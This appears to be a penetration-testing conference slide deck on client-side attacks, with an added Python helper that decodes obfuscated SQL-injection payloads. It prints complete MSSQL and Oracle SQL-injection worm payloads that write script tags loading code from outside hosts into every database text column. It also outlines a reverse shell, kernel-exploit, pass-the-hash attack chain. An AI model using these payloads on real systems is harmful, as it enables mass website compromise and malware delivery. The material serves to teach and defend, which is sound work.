Tactical Assassins : Client-Side OWNage


Prathan Phongthiproek
ACIS Professional Center
Senior Information Security Consultant
Who am I ?!
  Instructor / Speaker
  Red Team : Penetration Tester (Team Leader)
  Security Consultant / Researcher
  CWH Underground
  Exploits and Vulnerabilities Disclosure
     Milw0rm, Exploit-db, Security Focus, Secunia, Zeroday, etc
Let’s Talk!
  Attack Layer 8: Client-Side OWNage
     MS Office (Evil Macro)
     Malicious Adobe PDF
     Malicious USB
     One-Click Attack
     Evil-Twin Attack!

  Built-in Pen-Test Tactics
     Black Hat versus White Hat
     Using Black Hat styles to Compromise system

  Operation CloudBurst
Client-Side OWNage
The Way to Attack Layer 8!
MS Office (Evil Macro)!
  MS Office is Evil !!
Malicious Adobe PDF!
  Malicious PDF File
Malicious USB!
  Autoplay is NOT Autorun: Autoplay is the "what do you want to do with this media?"
   prompt, Autorun is Windows executing whatever autorun.inf on the volume tells it to

  Turning off Autoplay alone still leaves the host vulnerable to an evil USB stick

  Disable Autorun for every drive type instead: NoDriveTypeAutoRun = 0xff under
   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
One-Click Attack!
  SQL Injection Worms - MSSQL!

     ';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST
      (0x4400450043004C004100520045002000400054002000760061
      0072006300680061007200280032003500350029002C004000430
      02000760061007200630068006100720028003200350035002900
      20004400450043004C0041005200450020005400610062006C00
      65005F0043007500720073006F007200200043005500520053004
      F005200200046004F0052002000730065006C006500630074002
      00061002E006E0061006D0065002C0062002E006E0061006D00
      65002000660072006F006D0020007300790073006F0062006A00
      6500630074007300200061002C0073007900730063006F006C00
      75006D006E007300200062002000770068006500720065002000
      61002E00690064003D0062002E0069006400200061006E006400
      200061002E00780074007900700065003D002700750027002000
      61006E0064002000280062002E00780074007900700065003D00
      3900390020006F007200200062002E00780074007900700065003
      D003300350020006F007200200062002E0078007400790070006
      5003D0032003300310020006F007200200062002E00780074007
      900700065003D003100AS%20NVARCHAR(4000));EXEC(@S);--
One-Click Attack!
  SQL Injection Worms - MSSQL! (same payload, hex literal decoded from UTF-16LE)

     ';DECLARE @S NVARCHAR(4000);SET @S=CAST(
       DECLARE @T varchar(255),@C varchar(255)
       DECLARE Table_Cursor CURSOR FOR
         select a.name,b.name from sysobjects a,syscolumns b
         where a.id=b.id and a.xtype='u'
           and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
       OPEN Table_Cursor
       FETCH NEXT FROM Table_Cursor INTO @T,@C
       WHILE(@@FETCH_STATUS=0) BEGIN
         exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))
               +''<script src=http://www.fengnima.cn/k.js></script>''')
         FETCH NEXT FROM Table_Cursor INTO @T,@C
       END
       CLOSE Table_Cursor
       DEALLOCATE Table_Cursor
     AS NVARCHAR(4000));EXEC(@S);--

     xtype 99/35/231/167 are ntext/text/nvarchar/varchar: the cursor walks every
     text column of every user table (xtype='u') and appends the script tag to
     each value, so every page that renders database content serves the attacker's k.js
One-Click Attack!
  SQL Injection Worms - Oracle!

      http://127.0.0.1:81/ora4.php?name=1 and 1=(select
       SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE
       PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
       begin execute immediate '''''''' alter session set current_schema=SCOTT '''''''';
       execute immediate ''''''''commit'''''''';
       for rec in (select chr(117)||chr(112)||chr(100)||chr(97)||chr(116)||chr(101)||chr(32)||T.TABLE_NAME||chr(32)||chr(115)||chr(101)||chr(116)||chr(32)||C.column_name||chr(61)||C.column_name||chr(124)||chr(124)||
       chr(39)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)||chr(115)||chr(114)||chr(99)||chr(61)||chr(34)||chr(104)||chr(116)||chr(116)||chr(112)||chr(58)||chr(47)||chr(47)||chr(119)||chr(119)||chr(119)||chr(46)||chr(110)||chr(111)||chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr(101)||chr(46)||chr(99)||chr(111)||chr(109)||chr(47)||chr(116)||chr(101)||chr(115)||chr(116)||chr(46)||chr(106)||chr(115)||chr(34)||chr(62)||chr(60)||chr(47)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(39) as foo
       FROM ALL_TABLES T,ALL_TAB_COLUMNS C WHERE T.TABLE_NAME=C.TABLE_NAME and T.TABLESPACE_NAME like chr(85)||chr(83)||chr(69)||chr(82)||chr(83) and C.data_type like chr(37)||chr(86)||chr(65)||chr(82)||chr(67)||chr(72)||chr(65)||chr(82)||chr(37) and c.data_length>200) loop EXECUTE IMMEDIATE rec.foo;end loop;
       execute immediate ''''''''commit'''''''';end;'''';END;'';END;--','SYS',0,'1',0) from dual)--

      The chr() chains decode to the same idea as the MSSQL worm: for every column whose
      type matches '%VARCHAR%' and is longer than 200 characters in tablespace 'USERS', run
        update <table> set <column>=<column>||'<script src="http://www.notsosecure.com/test.js"></script>'
      The PL/SQL injection into DBMS_EXPORT_EXTENSION runs as SYS, which is why a single
      SELECT parameter is enough to rewrite the whole schema.
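Both worms obfuscate the statement they actually run (a UTF-16LE hex literal in the MSSQL case, chr(n)||chr(n) chains in the Oracle case), so the first job when one of these shows up in a web-server log is to decode it. The helper below is an added example for this write-up, not code from the talk. The sample payloads are constructed: MSSQL_SAMPLE carries the first 23 characters of the slide's hex literal, ORACLE_SAMPLE is the worm's select-list expression as printed on the slide, and the brace placeholders for column references are this example's own notation.

```python
"""Decode the two obfuscation styles used by the SQL-injection worms above.
Added analysis helper, not code from the talk.

* MSSQL variant: the T-SQL is shipped as a hex literal CAST to NVARCHAR,
  i.e. raw UTF-16LE bytes, so no keyword of the real statement is visible.
* Oracle variant: the DML is assembled from chr(n)||chr(n)||... pieces, so
  neither quotes nor keywords appear in the request either.

The samples are constructed for this example: MSSQL_SAMPLE carries the first
23 characters of the slide's hex literal, ORACLE_SAMPLE is the worm's
select-list expression as shown on the slide.
"""
import re
from urllib.parse import unquote

HEX_CAST = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f\s]+?)\s*AS\s+NVARCHAR", re.I)
CHR_CALL = re.compile(r"chr\s*\(\s*(\d+)\s*\)", re.I)
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def decode_mssql_hex_cast(payload: str) -> str:
    """Return the T-SQL hidden in CAST(0x... AS NVARCHAR(n)), or '' if absent.

    Accepts the payload as it appears in a web-server log (still URL-encoded)
    and tolerates whitespace inside the hex, as on the slides.
    """
    text = unquote(payload)
    m = HEX_CAST.search(text)
    if not m:
        return ""
    digits = re.sub(r"\s+", "", m.group(1))
    if len(digits) % 2:          # truncated capture: drop the dangling nibble
        digits = digits[:-1]
    return bytes.fromhex(digits).decode("utf-16-le", errors="replace")


def render_oracle_concat(expr: str) -> str:
    """Render a chr(n)||...||COLUMN||chr(n) expression as the text it builds.

    chr(n) pieces become their character; anything else (a column reference
    Oracle fills in per row, e.g. T.TABLE_NAME) is kept in braces, which is
    this example's own notation.
    """
    out = []
    for tok in expr.split("||"):
        tok = tok.strip()
        if not tok:
            continue
        m = CHR_CALL.fullmatch(tok)
        out.append(chr(int(m.group(1))) if m else "{" + tok + "}")
    return "".join(out)


def script_sources(sql: str) -> list:
    """URLs of every <script src=...> tag the decoded statement writes into data."""
    return SCRIPT_SRC.findall(sql)


# Constructed samples (see module docstring).
MSSQL_SAMPLE = (
    "';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
    "4400450043004C0041005200450020004000540020007600610072006300680061007200"
    "28003200350035002900"
    "%20AS%20NVARCHAR(4000));EXEC(@S);--"
)
MSSQL_UPDATE_FROM_SLIDE = (
    "exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))"
    "+''<script src=http://www.fengnima.cn/k.js></script>''')"
)
ORACLE_SAMPLE = (
    "chr(117)||chr(112)||chr(100)||chr(97)||chr(116)||chr(101)||chr(32)||"
    "T.TABLE_NAME||chr(32)||chr(115)||chr(101)||chr(116)||chr(32)||"
    "C.column_name||chr(61)||C.column_name||chr(124)||chr(124)||"
    "chr(39)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)||"
    "chr(115)||chr(114)||chr(99)||chr(61)||chr(34)||"
    "chr(104)||chr(116)||chr(116)||chr(112)||chr(58)||chr(47)||chr(47)||"
    "chr(119)||chr(119)||chr(119)||chr(46)||"
    "chr(110)||chr(111)||chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr(101)||"
    "chr(46)||chr(99)||chr(111)||chr(109)||chr(47)||"
    "chr(116)||chr(101)||chr(115)||chr(116)||chr(46)||chr(106)||chr(115)||"
    "chr(34)||chr(62)||chr(60)||chr(47)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(39)"
)

if __name__ == "__main__":
    print(decode_mssql_hex_cast(MSSQL_SAMPLE))
    print(render_oracle_concat(ORACLE_SAMPLE))
    print(script_sources(MSSQL_UPDATE_FROM_SLIDE),
          script_sources(render_oracle_concat(ORACLE_SAMPLE)))
```

Run it on a log line and the injected script host falls out directly, which is what you block at the proxy and grep for in the database; the UTF-16LE decode also explains why a keyword blacklist never saw "DECLARE" or "CURSOR" in the request.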
One-Click Attack!
  Link to Malicious Website -> Reverse Shell to Attackers
Evil-Twin Attack!
  Karma + Metasploit = Karmetasploit !!

     Rogue Access Point (Evil Twin): steal usernames,
      passwords and information from public wireless
      hotspots

     Why not steal something really valuable, like credit
      card numbers (pay-to-play hotspots)?
Built-in Pen-Test Tactics!
Black Hat versus White Hat!

  Black Hat (thinking outside of the box)        | White Hat (thinking inside the box)
  -----------------------------------------------|-------------------------------------------------
  Knows one piece of information and has to      | Assigned a limited block of IP addresses
  expand from there                              |
  Compromises all systems, then targeted attack  | Cannot go beyond the approved scope: only touch
                                                 | xyz hosts, don't touch abc host
  All methodologies integrated                   | Follows pen-test methodologies: OSSTMM, NIST, ISSAF
  Manual footprinting, no noisy scans, just      | Downloads exploits from Milw0rm, exploits with
  Nmap and 0-day attacks                         | Core Impact, CANVAS, Metasploit
  Attacks Layer 8: Client-Side OWNage            | "Oops, I cannot hack the user."
Using Black Hat styles to Compromise system
  The pen-tester must "think outside of the box"

  Attack Layer 8 : more effective results

  Pen-test with Black Hat styles
     Using a Black Hat mind
     Email address enumeration
     Social networking (Maltego)
     Social engineering (Adobe PDF, Evil Macro, One-Click
      Attack, IE Aurora, etc)
     Information gathering on all subdomains
          xyz.victim.com, abc.victim.com, 123.victim.com
     Blind test, compromise all systems and targeted attack
Operation CloudBurst!
KiTrap0D – Local Ring0 Kernel Exploit
  MS Windows NT #GP Trap Handler Allows Users to Switch Kernel
   Stack

  Affects every 32-bit release of the Windows NT kernel (Windows 2000, XP,
   Server 2003, Vista, Server 2008, 7)

  Not affected: Windows 7 (64-bit), Windows Server 2008 (64-bit,
   Itanium)

  Patch released as MS10-015 on Feb 09 2010                 Get The Hell
                                                            Outta Here !!

  Publicly disclosed in January 2010, so a 0-day for about a month. W00t ! W00t !
Token Kidnapping – Elevate Privilege
  Token: the Windows equivalent of a web session cookie, the object that
   carries the security context a process or thread runs with

  On Windows XP / 2003, Windows services run as the SYSTEM account
      Compromise of a service == full system compromise

  On Windows Vista / 2008, services run as LocalService / NetworkService,
   and token kidnapping turns those into SYSTEM

  Affects every release of the Windows NT kernel (Windows 2000, XP,
   Server 2003, Vista, Server 2008, 7)

  Patch released as MS09-012 on April 14 2009

  0-day for 1 year. W00t ! W00t !!

  Black hat mind !!
      Combine Attack Layer 8 + KiTrap0D + Token Kidnapping
Operation CloudBurst
  Start the mission with Attack Layer 8
     SPAM mail / 1-Click OWNage
     Reverse shell to the attacker

  KiTrap0D – The Message From Slave to God
     0-day Ring0 exploit, every 32-bit Windows release

  Maintain access
     Pivot (tunneling), backdoor position

  Compromise all systems and the Domain Controller
     Impersonate token, Pass-The-Hash attack
Operation CloudBurst!
  (Diagram) Victim on the intranet opens a reverse shell connection out to the
  attacker on the Internet; on the victim: KiTrap0D exploit, then pivot into the
  network (route add), then attack the network with Pass-the-Hash and token
  impersonation.
If someone is still in the room.. Q&A!

           THANK YOU!
